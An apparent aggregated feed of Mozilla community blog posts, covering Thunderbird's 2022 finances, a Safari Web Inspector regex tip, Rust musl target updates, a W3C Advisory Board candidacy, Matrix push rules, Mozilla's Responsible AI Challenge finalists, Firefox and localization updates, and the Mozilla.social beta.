But we are not content merely surviving. Our mission is to build the best email client and personal information manager available. To build professional software that puts your privacy first. To craft an experience that boosts your productivity, compliments your daily workflow, and meets your customization needs. And to expand the Thunderbird experience to Android and iOS. And to do all of this transparently, guided by the values of free and open source software. 

Donations In 2022

Last year, our mighty donor base – representing approximately 300,000 daily users – contributed a total of $6,442,704 in donations to the Thunderbird project. (Note: user donations represent more than 99.9% of our annual revenue.) Our 2022 donation income was a bright, assertive sign that you also believe in that mission, and you also want to see Thunderbird thriving. Not just in 2023, but decades into the future! 

Year-to-year donations to Thunderbird: 2017 through 2022.

This is nothing short of outstanding, and we are tremendously grateful for the generous donations of our users. Below, we’ll talk about what this enables us to do in the future, and how we spent some of that income in 2022. 

Before we discuss that, you might be wondering what we did differently to generate such a significant surge of support last year. 

At the end of 2021, we decided to make a bigger investment in communicating with you. That meant more frequent blog posts and newsletters, daily engagement across our social media channels, and expanding the number of places we interact with you (like our relatively new Mastodon account). 

Donations by month, comparing 2021 and 2022.

We also attribute this amazing uplift to the release of Thunderbird 102, as well as a first-of-its-kind, in-app donation appeal at the end of year. 

In short, we learned that projects like ours can benefit greatly from simply asking for donations, while simultaneously explaining how those donations will benefit the project – and ultimately, how they will benefit you. So let’s talk about that! 

Thunderbird’s People And Thunderbird’s Future

The heart of Thunderbird is obviously its people, and we invested heavily in personnel last year. We began 2022 with 15 core staff, and now employ a team of 24 in these roles:

  • Product and Business Development Manager
  • Director of Operations
  • Product Design Manager
  • Engineering Manager
  • Staff Engineers (3)
  • Sr SW Engineers (2)
  • Sr Security Engineer
  • SW Engineer, Add-Ons Ecosystem
  • Sr UI/UX Developer
  • UI/UX Developers (2)
  • Android Project Lead
  • Android Developer (1)
  • Build & Release Engineers (2)
  • Full Stack Developer
  • Front End Developer
  • Community Manager
  • Marketing Manager
  • Bug Triager
  • Support Engineer

The breakout growth we enjoyed last year means hiring even more talented people to vastly improve the Thunderbird desktop experience. This past year we expended significant effort to dramatically improve Thunderbird’s UX and bring it in-line with modern expectations and standards. In 2022 we also laid the groundwork for large architectural changes for Thunderbird on the desktop. These changes address many years of technical debt that has limited our ability to add new features at a brisk pace. This work will largely pay off in our 2024 release, however it does power some of the improvements in the 115 “Supernova” release this summer.

But we’re also building beyond the desktop, to provide you with a truly cross-platform, synergistic experience. Last summer we invested in the K-9 Mail Project, which is being steadily improved in its transformation to Thunderbird on Android. And yes, we’re almost ready to add an iOS version to our roadmap! Later in 2023, we’ll hire an iOS developer to begin creating the foundation for Thunderbird on iOS. 

Thunderbird is also expanding beyond the core experience you already use. We’ve been exploring additional sources of revenue in the form of new tools and services to increase your productivity. We’re planning to introduce some of these, in Beta status, later this year. Rest assured that we have no plans to charge money for the powerful Thunderbird experience you enjoy today (nor do we plan to remove features and charge for them later). 

Total Spending In 2022

The Thunderbird Project’s total operating expenses for 2022 was $3,569,706. While personnel is where most of our money is spent, there are other areas crucial to Thunderbird’s continued operation. Here’s an overview of our total spending in 2022:

A pie chart showing spending percentages for Thunderbird in 2022.

Professional Services are things like HR, legal and tax services, as well as agreements with other Mozilla entities to provide technology infrastructure and operational resources.

The remaining items help us to run the business, such as the services and technology we use to communicate and manage operations, insurance, bank and donation processing fees. 

Closing Comments

The state of Thunderbird’s finances is strong. But that doesn’t make our team complacent. We are careful stewards of the thoughtful donations we receive from you. We don’t just use it to enhance features; we invest it strategically towards ensuring long-term stability and viability of Thunderbird. Having healthy cash reserves ensures the long-term sustainability of Thunderbird, even during periods of economic instability.

Your ongoing financial gifts have enabled Thunderbird to go from surviving to thriving. But as it has been since 2003, Thunderbird’s future is in your hands. Please continue to donate, and we will continue to build software you can be proud of. 

Thank you,

Ryan Sipes
Thunderbird Product and Business Development Manager

The post Thunderbird Is Thriving: Our 2022 Financial Report appeared first on The Thunderbird Blog.

Karl DubostWeb Inspector Search Regex

Finding the right keyword in a search among thousand of lines of CSS, JavaScript, HTML code can be dreadful. There are solutions.

A lot of bouddha sculpted in wood, which looks very similar

I was searching for navigator.userAgent on the NYTimes website. All developer tools have search features. In Safari Web Inspector, Command + Shift + F will start the search tab.

The matched results for userAgent are userAgent but also:

  • isInWebViewByUserAgent
  • userAgentData
  • getUserAgent
  • userAgentIndicatesApp
  • UserAgentClientHints

I wanted to be able to reduce the search space. Let's try regex.

So I searched for

\.userAgent to match only the strings starting with a dot. We can't match only navigator.userAgent because someone might have made a variable of it. But this is not enough. I also wanted to remove other references to an object with a trailing names, by avoiding any additional ASCII characters.

\.userAgent[^a-zA-Z]+

That's it.

To access this feature you need to go to Settings in Web Inspector, then General, then check Regular Expression in the search section.

Screenshot of the Web Inspector with the regex search for UserAgent

Otsukare!

The Rust Programming Language BlogUpdating Rust's Linux musl targets

Beginning with Rust 1.71 (slated for stable release on 2023-07-13), the various *-linux-musl targets will ship with musl 1.2.3. These targets currently use musl 1.1.24. While musl 1.2.3 introduces some new features, most notably 64-bit time on all platforms, it is ABI compatible with earlier musl versions.

As such, this change is unlikely to affect you.

Updated targets

The following targets will be updated:

Target Support Tier
aarch64-unknown-linux-musl Tier 2 with Host Tools
x86_64-unknown-linux-musl Tier 2 with Host Tools
arm-unknown-linux-musleabi Tier 2
arm-unknown-linux-musleabihf Tier 2
armv5te-unknown-linux-musleabi Tier 2
armv7-unknown-linux-musleabi Tier 2
armv7-unknown-linux-musleabihf Tier 2
i586-unknown-linux-musl Tier 2
i686-unknown-linux-musl Tier 2
mips-unknown-linux-musl Tier 2
mips64-unknown-linux-muslabi64 Tier 2
mips64el-unknown-linux-muslabi64 Tier 2
mipsel-unknown-linux-musl Tier 2
hexagon-unknown-linux-musl Tier 3
mips64-openwrt-linux-musl Tier 3
powerpc-unknown-linux-musl Tier 3
powerpc64-unknown-linux-musl Tier 3
powerpc64le-unknown-linux-musl Tier 3
riscv32gc-unknown-linux-musl Tier 3
riscv64gc-unknown-linux-musl Tier 3
s390x-unknown-linux-musl Tier 3
thumbv7neon-unknown-linux-musleabihf Tier 3

Note: musl 1.2.3 does not raise the minimum required Linux kernel version for any target.

Will 64-bit time break the libc crate on 32-bit targets?

No, the musl project made this change carefully preserving ABI compatibility. The libc crate will continue to function correctly without modification.

A future version of the libc crate will update the definitions of time-related structures and functions to be 64-bit on all musl targets however this is blocked on the musl targets themselves first being updated. At present, there is no anticipated date when this change will take place and care will be taken to help the Rust ecosystem transition successfully to the updated time-related definitions.

Tantek ÇelikRunning For Re-election in the W3C Advisory Board (AB) Election

Hi, I’m Tantek Çelik and I’m running for the W3C Advisory Board (AB) to help continue transitioning W3C to a community-led, values-driven, and more effective organization. I have been participating in and contributing to W3C groups and specifications for over 25 years.

I am Mozilla’s Advisory Committee (AC) representative and have previously served on the AB for several terms, starting in 2013. In the early years I advanced the movement to offer open licensing of W3C standards, and make it more responsive to the needs of independent websites and open source implementers.

At the same time I co-chaired the W3C Social Web Working Group that produced several widely interoperably deployed Social Web Standards, most notably the ActivityPub specification, which has received renewed attention as the technology behind Mastodon and other social web implementations.

In my most recent AB terms I led the AB’s Priority Project for an updated W3C Vision, drove consensus in issues & meetings, and submitted & reviewed pull requests to advance our Vision draft.

Environmental sustainability is a global concern, and the impacts of technologies, services, and standards are important for W3C to consider in all of its work, as the TAG has summarized in the W3C TAG Ethical Web Principles. To raise the importance of sustainability (s12y) at W3C, last year I established the W3C Sustainability Community Group, and subsequently organized interested participants at TPAC 2022 into asynchronous work areas, such as working on Sustainability Horizontal Reviews.

The next two years of the Advisory Board are a critical transition period, and will require experienced & active AB members to work in coordination with the TAG and the Board of Directors to establish new models and procedures for sustainable community-driven leadership and governance of W3C.

I believe governance of W3C, and advising thereof, is most effectively done by those who have the experience of actively working in W3C working groups on specifications, and especially those who directly use & create on the web using W3C standards. This direct connection to the actual work of the web and W3C is essential to prioritizing the purpose & scope of governance thereof.

I post on my personal site tantek.com. You may follow my posts there or from Mastodon: @tantek.com@tantek.com.

I have Mozilla’s financial support to spend my time pursuing these goals, and ask for your support to build the broad consensus required to achieve them.

If you have any questions or want to chat about the W3C Advisory Board, Values & Vision, or anything else W3C related, please reach out by email: tantek at mozilla.com. Thank you for your consideration. This statement is also published publicly on my blog.

Patrick ClokeMatrix Push Rules & Notifications

In a previous post about read receipts & notifications in Matrix I briefly mentioned that push rules generate notifications, but with little detail. After completing a rather large project to improve notifications in Matrix I want to fill in some of those blanks. [1]

Note

These notes are true as of the v1.6 of the Matrix spec and also cover some Matrix spec changes which may or may not have been merged since.

Push notifications in Matrix

Matrix includes a push notifications module which defines when Matrix events are considered an unread notification or highlight notification [2] and how those events are sent to third-party push notification services.

Push rules are a set of ordered rules which clients upload to the homeserver. These are shared by all device and are evaluated per event by the homeserver (and also by clients). Default push rules are defined in the Matrix spec. Push rules power the unread (and highlight) counts for each room, push notifications, and the notifications API.

Each rule defines conditions which must be met for the rule to match and actions to take if the rule matches.

Processing of push rules occur until a rule matches or all rules have been evaluated.

Getting notifications

As some background, clients receive notifications in one of two ways, via polling /sync and/or via push notifications.

Web-based clients often receive events via polling:

Notification flow for web applications.

The sync response (both initial and incremental) include the count of unread notifications and unread highlight notifications per room.

Mobile applications often receive events via push [3]:

Notification flow for mobile applications.

Push notifications include the event information (or just the event ID) and whether the event was a highlight notification. (The event being pushed implies it increased the notification count.)

Note

The deployment of the push gateway must be paired with the application (the push keys must be paired). I.e. if you make your own application (or even your own build of Element iOS / Android) you cannot re-use the deployment at matrix.org and must have your own deployment.

Getting events which generated notifications

There’s an API to retrieve a list of events which the user has been notified about. This powers the “notification panel” on Element Web and is meant to help users catch-up on missed notifications.

It is fairly underspecified and the Synapse implementation has limitations:

  • Highlight notifications are only kept for 30 days
  • Non-highlight notifications are only kept for 72 hours

Additionally it works poorly for encrypted rooms.

Push rules background

Getting the configured push rules?

There’s a set of APIs to fetch or modify push rules, they let you:

  • Fetch all push rules
  • Create or delete an individual push rule
  • Fetch or update an individual push rule’s actions
  • Fetch or enable/disable an individual push rule

An initial sync includes all of a user’s push rules under the user’s account data.

Any changes to push rules are included in incremental syncs. Except for newly added rules to the specification (this is likely a homeserver bug).

Note that you cannot use the account data APIs to configure push rules. [4]

What makes up a push rule?

A push rule is a JSON object with the following fields:

  • rule_id: Unique (per-user) ID for the rule.
    • The rule_id for default rules have a special form (they start with a dot: .).
  • default: Whether the rule is part of the predefined set of rules.
  • enabled: Whether the rule is enabled.
  • conditions: an array of 0 or more conditions to match.
  • actions: 0 or more actions to take if the rule matches.

All conditions must match for a push rule to match. If there are no conditions, then the push rule always matches. Possible conditions include:

  • Check event properties against patterns or exact values
    • Strings can be compared via globbing or exact values.
    • The globbing behavior changes if you’re checking the body property or not.
  • Check against the number of room members
    • Used to (incorrectly) check if a room is a direct message.
  • Check if a user can perform an action via power rules
    • The only defined option is whether a user can send @room.

Push rule actions define what to do once a push rule matches an event.

  • notify: increment the notification count and send a push notification. Uses “tweaks” to optionally:
    • Play a sound.
    • Create a highlight notification, this causes the highlight count to be incremented (in addition to the notification count).
  • Can be an empty list to do nothing.

There are other undefined or no-op actions (dont_notify, coalesce) which will be removed in the next version of the spec. [5]

Types of push rules

Push rules have a type associated with them, these are executed in order:

  • Override: generic high priority rules
  • Content-specific: applies to messages which have a body that matches a pattern
  • Room-specific: applies to messages of a room
  • Sender-specific: applies to messages from a sender
  • Underride: generic low priority rules

The previously discussed shape of push rules is not the full story! There are special cases which do not accept conditions, but can be mapped to them.

  • Content-specific: has a pattern field which maps to a pattern against the body property.
  • Room-specific: the rule_id is re-used to match against the room ID.
  • Sender-specific: the rule_id is re-used to match against the event sender.

Why do clients care? Doesn’t the homeserver do this all for me?

Encryption ruins everything! Some of the push rules require the decrypted event content to be properly processed. The enable this, the default rules declare all encrypted events as notifications. Clients are expected to re-run push rules on the decrypted content. [6]

This can result in one of the following: [7]

  • Increment the highlight count (the decrypted event results in a highlight)
  • No change (the decrypted event results in a notification)
  • Decrement notification counts (the decrypted event results in no notification)

Due to gappy syncs clients frequently can only make a best estimate of the true unread / highlight count of events in encrypted rooms.

Warning

Element iOS / Android get encrypted events pushed to them, but do not properly implement mentions & keywords.

What happens by default?

The default rules are in the Matrix spec and include:

  • Highlight:
    • Tombstones
    • Room & user mentions
  • Do nothing:
    • Notice messages
    • Other room member events
    • Server ACL updates
  • Notification:
    • Invites to me
    • Messages and encrypted events in non-DMs
  • Notification with sound:
    • Incoming calls
    • Messages and encrypted events in DMs

Default rules can be disabled or have their actions modified on a per-user basis. Some of the above features are handled by multiple push rules.

Other “standard” rules

Element creates custom push rules based on a known form. [8]

  • Keywords (implemented as a content-specific rule with a pattern)
  • Per-room overrides:
    • All messages (implemented as a room-specific rule with a notify action)
    • Mentions & keywords (implemented as a room-specific rule with no actions)
    • Mute (implemented as an override rule to match the room ID with no actions)

Matrix also allows defining arbitrary rules (e.g. to change behavior for particular rooms, senders, message types, etc.)

What about unread rooms?

The unread (“bold”) rooms logic in Element Web is completely custom and outside of the Matrix specification.

Note that if you enable hidden events (or tweak other options to show events) then the behavior changes!

Putting it altogether…

…it gets complicated trying to figure out whether a message will generate a notification or not.

Flow chart of the default Matrix push rules when using Element.

The default Matrix push rules (also showing the options available within Element).

[1]Improving unintentional mentions (MSC3952) is the main feature we were working on, but this was powered by MSC3758 (from Beeper), MSC3873 (from a coworker), and MSC3966. MSC3980 was also a follow-up for consistency.
[2]

Notification count (the grey badge with count in Element Web) is the number of unread messages in a room. Highlight count (the red badge with count in Element Web) is the number of unread mentions in a room.

Warning

The unread (“bold”) rooms feature in Element Web, which represents a room with unread messages (but no notification count) is not powered by push rules (and is not specced).

See the Element Web docs on the room list.

[3]This post generally defines “push notifications” as a notification which is sent via a push provider to an application. Push providers include Apple, Google, Microsoft, or Mozilla.
[4]MSC4010 aims to make this explicit.
[5]See MSC3987.
[6]It was not clear how clients should handle encrypted events until recently
[7]Adapted from a Gist from Half-Shot.
[8]These don’t seem to be specced, I’m unsure if other clients create similar rules or understand these rules.

The Mozilla BlogMeet the ‘Responsible AI Challenge’ top 10 finalists

Last March, during the SXSW festival in Austin, Texas, Mozilla issued a call to builders and technologists all over the world to create trustworthy AI solutions when we relaunched the Mozilla Builders program and unveiled our Responsible AI Challenge — a one-day, in-person event designed to inspire and encourage a community of builders working on trustworthy AI products and solutions. 

The future of AI is promising! And there are those, like Mozilla, who believe in its power and potential to solve the world’s most difficult challenges. Nonetheless, we also recognize its risks and advocate for and contribute to the responsible development of AI for the betterment of society. Ultimately, we believe that responsible AI – technology that takes into consideration accountability, user agency, and individual and collective well-being – is demonstrably worthy of trust.

Challenge accepted! Announcing our top 10 finalists

After weeks of reviewing hundreds of competitive consumer technology and generative AI projects, it is with great pleasure that we announce our top 10 challenge finalists. The finalist selection process was made possible by a panel of select individuals including AI academics, developers and entrepreneurs. We’re deeply grateful to the panel for sharing their time, insight and expertise, and Mozilla is honored to share resources with and work alongside the final challengers and their projects listed below:

Micro Adventures is an AI-powered app that combines gamified local learning adventures for parents and kids.

Droomverhalen (Dutch for ‘dream stories’) is an AI-based story generator that enables parents to craft unique and personalized stories for their little ones.

LivePose Portal trains participants and deep-learning models for camera-based group interactivity in the immersive arts.

Nolano is a trained language model that uses natural language processing to run on laptops and smartphones.

Kwanele Chat Bot aims to empower women in communities plagued by violence by enabling them to access help fast and ensure the collection of admissible evidence.

Simprints is developing privacy-preserving, unbiased face biometrics with AI for NGOs and governments in global health and humanitarian programs.

Quirk is building game-based virtual worlds where children learn character building skills with the help of AI guidance and through play.

Visually Impaired Assistant System is a multi-disciplinary AI project that aims to improve accessibility for the visually impaired community.

Blind AI provides a confidential deployment solution for LLMs, in order to enable the protection of sensitive data when leveraging AI SaaS solutions.

Sanative AI provides anti-AI watermarks to protect images and artwork from being used as training data for diffusion models.

What’s in San Francisco? A golden state of mind.

Esteemed builders and technologists will join each other in San Francisco on May 31 for a day of discovery and celebration as we showcase some of the most innovative and responsible uses of AI to date, learn from industry thought leaders, and discover the future of AI together.

In addition to cash prizes, the top three Responsible AI Challenge winners will receive ongoing access to mentorship from leaders in the industry as they continue to develop, refine and deliver their responsible AI projects.

“Mozilla is in great company working beside other organizations and individuals committed to responsible innovation and ensuring the future of AI is one that provides ethical solutions that benefit humanity. We’re already blown away by the caliber of applications we’ve gotten and are grateful for the community support we’ve received from folks like Craig Newmark Philanthropies and others who have stepped forward to make this challenge a reality.”

Imo Udom, Senior Vice President of Innovation Ecosystems at Mozilla

Meet our judges and speakers

The event will feature keynotes from Margaret Mitchell, chief AI ethics scientist at Hugging Face who was also recently named one of Time’s Top 100 Most Influential People, and Gary Marcus, Emeritus Professor of Psychology and Neural Science at NYU and bestselling author. We’ll also introduce a special guest! 

Finalists will have the opportunity to pitch in front of a panel of judges with combined expertise in technology, entrepreneurship and ethics.

Margaret Mitchell, Speaker

Margaret is the Chief Ethics Scientist at Hugging Face, with deep experience in ML development, ML data governance, and AI evaluation.

Gary Marcus, Speaker

Gary is the Emeritus Professor of Psychology and Neural Science at NYU and the author of five books, including New York Times Bestseller Guitar Zero.

Raffi Krikorian, Judge

Raffi is an Armenian-American technology executive and the CTO of the Emerson Collective.

Lauren Wagner, Judge

Lauren is an early-stage investor and Fellow at the Berggruen Institute.

Ramak Molavi, Judge

Ramak is a digital rights lawyer and has led the “Meaningful AI Transparency” research project at Mozilla since 2021.

Raesetje Sefala, Judge

Raesetje is an AI Research Fellow at the Distributed AI Research Institute (DAIR).

Damon Horowitz, Judge

Damon is a technologist, philosophy professor and serial entrepreneur.

James Hodson, Judge

James is the CEO of the AI for Good Foundation, which is building economic and community resilience through technology.

Deb Raji, Judge

Deb is a Nigerian-Canadian computer scientist and activist working on algorithmic bias, AI accountability, and algorithmic auditing.

Visit the Responsible AI Challenge website for the full and announced list of finalists, judges, speakers and partners. 

The post Meet the ‘Responsible AI Challenge’ top 10 finalists appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderCast Episode #2: With Special Mozilla Guest Mike Conley

The Thunderbird logo, a headshot of Mike Conley, and the text "ThunderCast #2: Mozilla's Mike Conley & The Retro Internet Retreat"

Welcome back to the ThunderCast, the official podcast of Mozilla Thunderbird! In this episode, we’re thrilled to welcome our first special guest: Mike Conley, Principal Software developer at Mozilla. Mike is a software mechanic, musician, livestreamer, and self-described “pre-internet phenomenon” among many other awesome things.

We had a wonderful, energetic conversation about the early days of the internet, Mike’s early work on Mozilla Messaging, and his current work on Firefox. He also gives us a peek behind the curtain of upcoming Picture-in-Picture features, and some fresh changes to Firefox’s migration tools.

We also asked Mike about some of the more underrated features of Firefox. Plus, we get the community involved by asking you which Thunderbird features more people should know about.

Hope you enjoy listening to this one as much as we enjoyed recording it!

Where To Get The Podcast

Links Mentioned

1) uBlock Add-on for Thunderbird:

2) The Joy of Coding:

3) Neocities, making the internet fun again

4) Follow us on the Fediverse: 

Transcript

We include a full transcript of the episode inside the podcast metadata, which should be supported by your podcast app. If it’s not, here’s a direct link to the Episode 2 transcript.

The post ThunderCast Episode #2: With Special Mozilla Guest Mike Conley appeared first on The Thunderbird Blog.

Tiger OakesDisplay math formulas without any CSS or JS

MathML lets you insert math formulas with just HTML.

Firefox NightlyShort but Sweet – These Weeks in Firefox: Issue 137

Highlights

  • aminomancer and Negin from the OMC team are making it possible to embed the new migration wizard nicely in about:welcome! This metabug tracks that effort.
  • bnasar added support for a new keyboard shortcut to toggle PiP fullscreen mode
    • You can now press the “f” key or double click the PiP window to toggle fullscreen mode
  • At long last, after much experimentation, the about:home startup cache is being (cautiously) rolled out to users on the release channel! The about:home startup cache improves the loading time of about:home on browser start. If all goes well, we expect (almost) all users to have the cache enabled by default in Firefox 113. We may continue to do a few holdback studies just to double-check the performance of the cache in the wild.

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Itiel
  • Mathew Hodson
  • portiawuu
  • Victoria Ajala

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
WebExtension APIs

Developer Tools

DevTools
WebDriver BiDi
  • Sasha added support for “channels” to our script.callFunction and script.addPreloadScript commands. This allows clients to create custom events (eg DOM Mutations) (bug).
  • Sasha also updated our serialization to match the latest spec updates. This gives better control for objects and DOM nodes serialization (bug).
  • Thanks to Jamie for also fixing Marionette’s getComputedRole to return ARIA roles (bug).

ESMification status

  • Progress has levelled-off a little, but some bigger patches are in the pipeline.
  • Converting modules used in workers is waiting on ES module workers to ship (probably shipping in 114).
  • ESMified status:
    • browser: 63%
    • toolkit: 78%
    • Total: 75.5% (up from 74.6%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

Migration Improvements (CalState LA Project)

Picture-in-Picture

Search and Navigation

Storybook/Reusable Components

Mozilla Localization (L10N)L10n Report: May 2023 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

We also want to welcome Ayanaa Rahman to the localization team. She’s joining us for an internship as a backend software engineer, and you’ll see her active primarily around Pontoon. Here’s a few words from her:

Hi all, I’m Ayanaa Rahman. I recently completed my third year studying Computer Science at the University of Toronto. I have also worked at financial institutions in both the US & Canada as a Software Developer intern, focusing on automation and big data.

Born into an immigrant family and raised in the multicultural city of Toronto, I’ve been exposed to multiple languages and cultures throughout my life. This experience has highlighted the importance of effective communication across different languages, particularly to enhance people’s digital experiences. I am eager to leverage my background and skills to make a meaningful contribution to the Mozilla community.

New content and projects

What’s new or coming up in Firefox desktop

Firefox 113, shipping to release users on May 9, is going to include a new locale: Tajik (tg). Huge thanks to Victor Ibragimov, the locale manager, and all other community members for achieving such an impressive result. Victor has been amazing over the last months, both online and offline, in finding resources and promoting the Tajik language.

In terms of new features, developers are currently working on the workflow to import data from other browsers, and we expect an overall increase in the number of strings around messaging and onboarding. Keep an eye out on notifications in Pontoon for updated testing instructions.

Fonts and fingerprinting

Firefox developers are working on reducing the ability for websites to track users based on their browser “fingerprint”, and fonts are one of the characteristics that bad actors can use to uniquely identify your browser.

By restricting access to only fonts pre-installed with the operating system, this form of fingerprinting becomes much less effective. The challenge is that it could impair the experience for users that access content in other languages, as they might rely on fonts installed through other systems (e.g. OS language packs).

Given how large the number of possible scenarios is, the team working on this feature needs help from the localization community to ensure user experience is not degraded. This document contains detailed information about the feature, how to test it and how to report errors.

What’s new or coming up in mobile

Things have been moving quite a bit in mobile land since our last report in January – especially with the past couple of versions leading up to the next v114 (in Nightly right now) – which all feature some notable updates.

A reminder that the last day to get translations in for version 114 is May 28 (all strings for this version should have landed by May 5th approximately).

One thing you may have noticed are the experiments going on these days both in Firefox desktop and mobile (often labeled as “Nimbus” in localization comments and string IDs). For mobile, we have been playing around with onboarding cards, as we suggest new users to change their default mobile browsers to Firefox.

Other notable updates are:

  • Users can now choose whether to be asked every time they open a link that would open in another app
  • Websites that use window.print() can now be printed in Firefox for Android
  • Improvements to Credit Card Autofill
  • Cookie Banner Reduction/Blocking: this new feature aims at providing users a seamless browsing experience by drastically minimizing cookie banner annoyance while also delivering the most private and secure option to handling the cookie banners

Now on to some community highlights: on mobile, Tajik (tg) has recently shipped at 100% complete translation on Focus for Android browser, making it the third browser available to Tajik speakers: Firefox for desktop, Firefox for Android, and now Focus for Android. As mentioned previously in this newsletter, congratulations to Victor and his team for sustaining this work – and the community – across the board! We look forward to the local initiatives taking place in Tajikistan in the near future, expanding the open, free and accessible internet in the region.

Amharic (am) has also recently shipped entirely localized versions of Firefox for Android, Focus for Android and Focus for iOS. Congratulations to the team who has worked relentlessly on keeping these projects up to date as well as growing the community.

Sardinian (sc) also recently initiated and completed Firefox for Android localization, as an ongoing effort in their existing projects. And Persian (fa) locale has been ramping up with projects thanks to locale manager Reza and fellow translator MSKF.

We want to take the opportunity to remind folks that Firefox for Android has an in-app language switcher, which works independently from the native Android OS language options. It generally supports a larger set of languages than the Android system language settings does. Head over to your Firefox for Android “Settings > Language” to discover 100+ languages available. (Taking the opportunity to note that a language switcher also exists within the Mozilla VPN settings, which seems to be a feature overlooked by many).

What’s new or coming up in web projects

Relay Website

As you may have noticed, the app.ftl file is no longer in Pontoon. In place are multiple, feature oriented files. The goal is to make each file more modular so it gives more context where strings land in the product. And it also offers flexibility to provide regional specific strings. There will be a few more of these efforts in the future. If the strings were localized prior to the migration, they are already moved to the new file, including contribution history. No need to go in to retranslate them. If there are untranslated strings, they are brand new strings.

Mozilla.org

This is a heads-up. A few pages from the Relay Website project will be migrated to mozilla.org. Pages to be migrated include faq.ftl and landing.ftl. Like the previous migrations, the Pontoon team will do their best to preserve the work you did, including attributes to each of the localized strings,  approved or pending for review.  For locales that have not localized the Relay product, you will see an increase in untranslated strings. You can prioritize these sets of files against others.

The migration is scheduled to be complete before the next l10n report. The purpose of this migration is for better search ranking. A link to the Relay pages will be added to the navigation bar.

Firefox Accounts

The Firefox accounts team are undergoing work to improve the user experience around account authentication and data recovery. Some changes are already in progress, and going forward you should see more strings related to two factor authentication, account recovery, password resets, and more. Many of these changes can be viewed before changes go to staging or production by checking Storybooks which can show English strings in context. The link to Storybooks can be found under the resources section of Firefox Accounts within Pontoon.

What’s new or coming up in SUMO

  • Check out the SUMO Sprint wikipage for Firefox 113 to learn more about how you can help with this release.
  • Watch the recording of our community call in March if you haven’t already to learn more about SUI (Simplified User Interface) screenshot that Lucas shared.
  • It’s also highly recommended to watch our community call in April to catch up on the result of the contributor survey we’ve done in Q1.
  • If you’re a Social Support or Mobile Store Support contributor, make sure to watch the contributor forum to get updates about queue stats every week. Kiki will post the update by the end of the week to make sure that you’re updated. Here’s the latest one from last week.
  • You can now learn more about Kitsune releases by following this Discourse topic.

What’s new or coming up in Pontoon

Pretranslation

We have successfully completed the Alpha testing phase of the Pretranslation feature with the Italian and Slovenian locale. The results, especially when accounting for the bugs fixed during the testing period, were quite promising:

  • 51.62% pretranslated strings were approved without changes.
  • 96.16% were manually reviewed as “usable”.
  • The average chrF++ score was 93.01

Between April and June 2023, Pontoon Pretranslation feature will be in the Beta testing phase with a total of 9 participating locales. In case of a success, we expect to make the feature available to more locales soon after. Stay tuned!

New contributions

Thanks to our army of awesome contributors for recent improvements to our codebase:

  • Willian, who joined the project last year, landed 10 additional patches(!) recently, including making the All contributions view the new default view on the Profile page.
  • Ivan added support for reading project configurations from the repository. (Ivan, sorry it took forever to review it!)
  • Uriel added support for implicit TLS emails.

Newly published localizer facing documentation

We have neglected our Pontoon documentation for a long time, and unfortunately it shows. We’re actively working on updating it, and we plan to wrap this project by the end of June.

Events

Localization “Fireside Chat”: come join us on Wednesday May 10, at 9am PT, where we will answer any questions you may have concerning updates contained in this localization report. This is the first time the localization-drivers try out this type of event, and we will accommodate for more timezones in the next iteration. It will take place on AirMozilla, and is open to anyone interested.

In the meantime you can check out our blog and visit past reports here.

Stay tuned on Discourse or in our Matrix channel for more info coming out soon!

Start asking questions here (or in this pad). You can also drop questions in the comments section of this blog post. Note that during the event, you will be able to ask more questions on our Matrix channel, and we will address them live if time permits.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Image by Elio Qoshi

  • Thanks to all locale managers and translators who are helping us to test the Pretranslation feature in Pontoon. The locales currently involved are: cy, de, es-AR, fr, hu, id, it, sl, zh-TW. Your help, on top of what you’re doing every day to support Mozilla, is very much appreciated.
  • Kudos to Aderajew and Bantegize who single-handedly revived the Amharic community in a span of a few months! They completed the localization of a few mobile projects, and are making progress weekly on the mozilla.org project. Between the two of them, they split the tasks of what they each do best: localizing the products but also looking for new contributors, building up the community. Way to go!
  • Parvez and Abass led the effort in completing several high priority projects for Saraiki, including Firefox desktop, mobile products for Android, and mozilla.org.

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

 

Did you enjoy reading this report? Let us know how we can improve it.

The Mozilla BlogThe internet deserves a better answer to social

The internet isn’t just about browsers. Browsers are a critical part of the human experience on the internet and will always be core to our work at Mozilla. But the internet is bigger than browsers — it’s every piece of content, app and experience on your device. Our mission will always be to make the internet better for everyone, and because of that, just like with browsers over the last quarter century, we need to show a better way forward in problematic areas over the next 25 years. And today, I’m thrilled to share a new area of experimentation for us — social. 

Love it or hate it, there’s no denying that social media is a huge part of our lives. At its best, it’s how we connect with one another across space and time, discover new ideas, learn what’s happening in the world, and get introduced to content that makes us feel. It provides critical services, like alerting us to catastrophic weather or that the train you’re waiting for is delayed. It’s helped chip away at traditional power dynamics, giving a public platform to voices that haven’t had one before and offering a way for us to have influence over the powers and decision-markers that shape our lives. 

But, look, at the risk of being both dramatic and cliched, social is broken. Most of those great things I just mentioned are…well none of them are working super well right now, are they? Things are primed for experimentation and a new direction, and we believe the Fediverse is central to that. Why? Because it moves power away from big tech companies and into the hands of diverse voices to build a social platform that meets people’s needs, not shareholders’ needs.

Last year, we announced we’re dipping our toes into the world of Mastodon. Today, we’re expanding Mozilla.social to a private beta. We’ve put a lot of work into getting to this stage, but there is a lot more to do before we open it up more broadly. We’re making a long-term investment because we think we can contribute to making Mastodon, and social media generally, better.

You’ll notice a big difference in our content moderation approach compared to other major social media platforms. We’re not building another self-declared “neutral” platform. We believe that far too often, “neutrality” is used as an excuse to allow behaviors and content that’s designed to harass and harm those from communities that have always faced harassment and violence. Our content moderation plan is rooted in the goals and values expressed in our Mozilla Manifesto — human dignity, inclusion, security, individual expression and collaboration. We understand that individual expression is often seen, particularly in the US, as an absolute right to free speech at any cost. Even if that cost is harm to others. We do not subscribe to this view. We want to be clear about this. We’re building an awesome sandbox for us all to play in, but it comes with rules governing how we engage with one another. You’re completely free to go elsewhere if you don’t like them. 

